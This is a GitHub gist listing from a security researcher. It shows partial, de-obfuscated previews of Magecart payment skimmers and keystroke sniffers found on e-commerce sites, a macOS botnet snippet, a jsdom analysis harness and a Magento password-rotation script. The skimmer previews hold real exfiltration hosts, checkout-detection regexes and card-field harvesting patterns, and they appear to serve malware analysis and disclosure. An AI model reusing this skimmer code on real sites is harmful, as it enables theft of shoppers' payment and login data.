Willem de Groot gwillem

Block or report user

Report or block gwillem

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@gwillem
gwillem / keystroke_sniffer_1.js
Last active May 18, 2019
BestOfTheWeb.com Security Seal contains no fewer than two different keystroke sniffers (2019-05-13) -- obfuscated version here: https://urlscan.io/responses/5c4474793baf83d5376045163d77f8f2ecd228ba5941ee8572489cb475a3cd1b/
// Shared state of the keystroke sniffer (de-obfuscated sample, see the gist
// description). Everything that follows in the file hangs off this one global.
var sniffData = {};
// Remote URL the sample talks to. Given the key name this is presumably the
// exfiltration endpoint (IoC: font-assets.com) -- confirm against the send
// routine further down the file, which is not part of this preview.
sniffData['Gate'] = 'https://font-assets.com/img';
// field id -> field value, filled in by SaveParam (defined right below).
sniffData['Data'] = {};
// Presumably the records already transmitted; its use is outside this preview.
sniffData['Sent'] = [];
// `![]` is just an obfuscated `false` (an array is truthy). SaveParam sets it
// to `!![]` (true) once a captured value passes its checks.
sniffData.IsValid = ![];
sniffData.SaveParam = function(field) {
if (field.id !== undefined && field.id != '' && field.id !== null && field.value.length < 0x100 && field.value.length > 0x0) {
if (_0x5c4ab6(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', '')) && _0xdc5c77(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', ''))) sniffData.IsValid = !![];
sniffData.Data[field.id] = field.value;
return;
View original.js
var _0x19f5=['\x61\x57\x35\x75\x5a\x58\x4a\x49\x5a\x57\x6c\x6e\x61\x48\x51\x3d','\x61\x47\x39\x79\x61\x58\x70\x76\x62\x6e\x52\x68\x62\x41\x3d\x3d','\x52\x6d\x6c\x79\x5a\x57\x4a\x31\x5a\x77\x3d\x3d','\x59\x32\x68\x79\x62\x32\x31\x6c','\x61\x58\x4e\x4a\x62\x6d\x6c\x30\x61\x57\x46\x73\x61\x58\x70\x6c\x5a\x41\x3d\x3d','\x64\x57\x35\x6b\x5a\x57\x5a\x70\x62\x6d\x56\x6b','\x5a\x58\x68\x77\x62\x33\x4a\x30\x63\x77\x3d\x3d','\x5a\x47\x56\x32\x64\x47\x39\x76\x62\x48\x4d\x3d','\x63\x48\x4a\x76\x64\x47\x39\x30\x65\x58\x42\x6c','\x61\x47\x46\x7a\x61\x45\x4e\x76\x5a\x47\x55\x3d','\x59\x32\x68\x68\x63\x6b\x4e\x76\x5a\x47\x56\x42\x64\x41\x3d\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x6d\x62\x32\x35\x30\x4c\x57\x46\x7a\x63\x32\x56\x30\x63\x79\x35\x6a\x62\x32\x30\x76\x61\x57\x31\x6e','\x53\x58\x4e\x57\x59\x57\x78\x70\x5a\x41\x3d\x3d','\x55\x32\x46\x32\x5a\x56\x42\x68\x63\x6d\x46\x74','\x55\x32\x46\x32\x5a\x55\x46\x73\x62\x45\x5a\x70\x5a\x57\x78\x6b\x63\x77\x3d\x3d','\x64\x47\x56\x34\x64\x47\x46\x79\x5a\x57\x45\x3d','\x
View skimmer.js
var _0xBCEC = ["68$61$77$6b$73$73$68$6f$70$2e$63$6f$6d", "2f$63$68$65$63$6b$6f$75$74", "", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d$2f$61$6e$61$6c$79$7a$65", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d$2f$53$4a$7a$54$43$72$78$4d$4f$30$4f$37$74$69", "6d$61$67$65$32$5f$64$65$66$61$75$6c$74", "length", "wtf", "prototype", "$", "split", "reduce", "fromCharCode", "map", "replace", "toString", "rot13", "Z", "charCodeAt", "rot5", "join", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", "_utf8_encode", "charAt", "_keyStr", "indexOf", "_utf8_decode", "\n", "isUndefined", "isNull", "href", "location", "div", "createElement", "i", "getElementsByTagName", "innerHTML", "<!--[if gt IE ", "]><i></i><![endif]-->", "childNodes", "nodeType", "push", "getAttribute", "attributes", "nodeName", "nodeValue", "textContent", "innerText", "getComputedStyle", "display", "no
gwillem / main.py
Last active Apr 23, 2019
dfurniturestore.co.uk MacOS X botnet code -- found on https://dfurniturestore.co.uk/js/Update 04-19.dmg
import os
import pwd
import random
import string
import urllib, urllib2
import json
import time
import sys
import base64
import random
gwillem / enforce-passwd-change.sh
Created Mar 4, 2019
Enforce new passwords for all Magento 1 staff users
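# Requires n98-magerun
#
# Rotate the password of every active Magento 1 admin ("staff") user and
# print the new credentials, one "user -> password" line each, to stdout.
# That output is the only copy of the new passwords, so capture it somewhere
# safe (or redirect it) before running.
#
# Password length in characters; override with PASS_LENGTH=... if needed.
pass_length="${PASS_LENGTH:-10}"
# admin:user:list prints one CSV row per user; keep only rows that carry the
# literal ",active" status column. read -r keeps backslashes in the row intact.
n98-magerun admin:user:list --format=csv | grep ',active' | while read -r row;
do
  # Username is the second CSV column. Everything is quoted so a row that
  # contains spaces or glob characters is not mangled by word splitting.
  user=$(printf '%s\n' "$row" | cut -d, -f2)
  # Random alphanumeric password: strip everything but [A-Za-z0-9] from
  # /dev/urandom, wrap to the wanted width, take the first line. head closing
  # the pipe is what stops tr.
  pass=$(tr -cd '[:alnum:]' < /dev/urandom | fold -w "$pass_length" | head -n1)
  echo "$user -> $pass"
  # The new password is passed on the command line, so while the command runs
  # it is visible to other local users through the process list; only run
  # this on a trusted host.
  n98-magerun admin:user:change-password "$user" "$pass" >/dev/null
done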
gwillem / onlineclouds.cloud_conversion_async_unfuscated.js
Created Nov 19, 2018
Malware from onlineclouds.cloud, de-obfuscated
// Entry point of the skimmer: one timer, 100 ms after this script runs, that
// checks whether the current page is a checkout page (see checkForCheckout).
// Only this single call is visible here; if the check re-arms itself, that
// happens further down the file.
setTimeout(checkForCheckout, 100);
// Assigned elsewhere in the file; its role is not visible in this preview.
var snd = null;
// Decide whether the current page looks like a checkout page by testing
// window.location (coerced to its href string by RegExp.test) against a list
// of checkout URL fragments, several of which are names of Magento checkout
// extensions. On a match, call scrapeAllFields (defined elsewhere in the
// file), which by its name collects the page's form fields.
// The pattern has no `i` flag: `Checkout` and `checkout` are listed
// separately and other capitalisations would not match -- the fragment list
// is a usable detection signature for this family.
function checkForCheckout() {
if ((/onepage|firecheckout|Checkout|onestepcheckout|onepagecheckout|checkout|oscheckout|idecheckoutvm|fancycheckout/).test(window.location)) {
scrapeAllFields();
}
}
function createQueryString() {
View secure.livechatinc.org.js
// Declared but not initialised in this preview; presumably assigned a Base64
// codec object further down the file (the name suggests encryptData uses it).
var Base64;
// Read the text of the currently selected option of the billing-address
// <select> (via jQuery) into a local. The value is neither returned nor
// stored, so as shown this is dead code or a de-obfuscation artefact.
// Note the stray spaces inside the attribute value (`' billing_address_id '`):
// as written the attribute selector only matches a name containing those
// spaces, which is unlikely to be intended -- confirm against the original.
function setSavedAddr() {
var B0f;
B0f = jQuery(`select[name=' billing_address_id '] :selected`).text();
}
function encryptData(n0f, k0f) {
var y0f, h8V, m8V, x8V;
gwillem / infowarstores.com.js
Created Nov 13, 2018
de-obfuscated infowarsstore.com payment skimmer as detected on 2018-11-12 by https://twitter.com/gwillem
var idString = "id",
nameString = "name",
tokenOrCSRF = new RegExp("token|search|csfr|keyword|button"),
zoneRegionStateCountry = new RegExp("zone|region|state|country"),
formObj = {},
formLength = 0,
emptyString = "",
devToolsStatus = {
open: !1,
orientation: null
gwillem / techrabbit.com.js
Last active Oct 9, 2018
TechRabbit.com busted by Magecart again. Malware hosted at checkercarts.com / exfil server itenvoirtech.com
// Configuration block of the skimmer (de-obfuscated). Everything here is a
// plain constant; the collection and exfiltration code follows in the rest of
// the file, outside this preview.
// Mirror the page's scheme, presumably so the outgoing request is not blocked
// as mixed content.
var protocol = window.location.protocol != 'https:' ? 'http://' : 'https://';
var hostname = window.location.host;
// Input name/id fragments that mark a field as interesting: card data, billing
// and shipping address, contact details. Usable as a detection signature.
var fieldNameRegex = 'shipping|billing|payment|cc|month|card|year|expiration|exp|cvv|cid|code|ccv|authorize|firstname|lastname|street|city|phone|number|email|zip|postal|region|country';
// Loose card-number pattern: 13-16 digits, or 16-20 characters made of digits,
// spaces and dashes.
var ccRegex = '[0-9]{13,16}|[0-9 -]{16,20}';
// Input types that are harvested -- note that password and hidden are included.
var fieldTypeRegex = 'select|password|checkbox|radio|text|hidden|number|tel|email';
// Selectors for anything that might be a "place order" control; presumably a
// click handler is attached to these further down (not visible here). The
// spaces inside the href values (`javascript: ; `) look like de-obfuscation
// artefacts -- confirm against the original before using them as a signature.
var orderButtons = 'a[title*=\'Place Order\'],a[href*=\'javascript: ; \'],a[href*=\'javascript: void (0)\'],a[href*=\'javascript: void (0); \'],a[href=\'#\'],button,input,submit,.btn,.button';
var emptyString = '';
// Path for the outgoing request: the page's own path (including any query
// string) with '/saveOrder' appended. indexOf('/') is taken on the href with
// '://' removed, so the +3 puts the index back onto the original href before
// substr cuts off the scheme and host.
var saveOrderURL = window.location.href.substr(window.location.href.replace('://', '').indexOf('/') + 3) + '/' + 'saveOrder';
var emptyList = [];
// Exfiltration server (IoC): itenvoirtech.com, as named in the gist description.
var dropServers = ['itenvoirtech.com'];
gwillem / pageseal.js
Created Sep 16, 2018
Page Seal partially de-obfuscated
// Analyst harness, not part of the malware: build a minimal DOM with jsdom so
// the (partially de-obfuscated) Page Seal script can run under Node without a
// browser.
const jsdom = require("jsdom");
const { JSDOM } = jsdom;
// Trivial page; the url option is set presumably because the sample inspects
// window.location (the sample itself is further down the file).
const dom = new JSDOM(`<!DOCTYPE html><p>Hello world</p>`,
{ url: "https://example.org/" });
// Expose the browser-style globals the sample expects. Declared with `var`,
// which tolerates a later re-declaration by the sample's own code where
// `const` would throw.
var window = dom.window
var document = window.document
// jQuery bound to the jsdom window, also aliased as jQuery -- presumably
// because the sample refers to it by that name.
var $ = require("jquery")(window);
var jQuery = $;